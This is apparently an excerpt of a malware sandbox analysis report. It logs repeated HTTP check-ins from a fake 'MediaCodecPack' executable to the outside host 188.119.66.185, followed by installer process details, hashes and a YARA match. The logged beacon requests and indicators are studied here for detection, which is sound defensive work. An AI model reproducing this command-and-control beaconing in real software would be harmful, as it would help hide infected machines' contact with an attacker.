5 | 192.168.2.4 | 49780 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:13 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:14 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:14 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49786 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:15 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:16 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:16 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49792 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:18 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:18 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:18 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49797 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:20 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:21 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:21 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49807 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:23 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:23 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:23 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49814 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:25 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:26 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:26 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49819 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:28 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:28 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:28 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
12 | 192.168.2.4 | 49825 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:30 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:30 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:30 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:30 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
13 | 192.168.2.4 | 49831 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:32 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:33 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:33 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:33 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
14 | 192.168.2.4 | 49837 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:35 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:35 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:35 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:35 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
15 | 192.168.2.4 | 49843 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:37 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:38 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:37 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:38 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
16 | 192.168.2.4 | 49849 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:39 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:40 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:40 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:40 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
17 | 192.168.2.4 | 49855 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:42 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:43 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:42 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:43 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
18 | 192.168.2.4 | 49861 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:44 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:45 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:45 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:45 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
19 | 192.168.2.4 | 49867 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:47 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:48 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:48 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
20 | 192.168.2.4 | 49878 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:49 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:50 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:50 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
21 | 192.168.2.4 | 49883 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:52 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:52 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:52 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
22 | 192.168.2.4 | 49889 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:54 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:55 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:54 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:55 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
23 | 192.168.2.4 | 49894 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:56 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:57 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:57 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:57 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
24 | 192.168.2.4 | 49900 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:59 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:45:59 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:45:59 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:45:59 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
25 | 192.168.2.4 | 49905 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:46:01 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:46:02 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:46:02 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:46:02 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port and PID (run together) | Process
26 | 192.168.2.4 | 49911 | 188.119.66.185 | 4435544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:46:04 UTC | 291 | OUT |
  GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
2024-12-18 12:46:04 UTC | 200 | IN |
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Wed, 18 Dec 2024 12:46:04 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/7.4.33
2024-12-18 12:46:04 UTC | 24 | IN |
  Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e8b723663ec13250


Session ID: 27
Source IP: 192.168.2.4
Source Port: 49918
Destination IP: 188.119.66.185
Destination Port: 443
PID: 5544
Process: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:46:06 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:46:07 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:46:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:46:07 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Target ID: 0
Start time: 07:44:01
Start date: 18/12/2024
Path: C:\Users\user\Desktop\steel.exe.3.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\steel.exe.3.exe"
Imagebase: 0x400000
File size: 3'295'664 bytes
MD5 hash: DB153670ED84A7E848FA356E7AECC80D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 07:44:01
Start date: 18/12/2024
Path: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe"
Imagebase: 0x400000
File size: 706'560 bytes
MD5 hash: 192CB1EFDC38E560F417C173410B8749
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2981700405.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 2
Start time: 07:44:02
Start date: 18/12/2024
Path: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i
Imagebase: 0x400000
File size: 3'186'888 bytes
MD5 hash: 1BADA3AB49364C26DA68D41031611AC7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
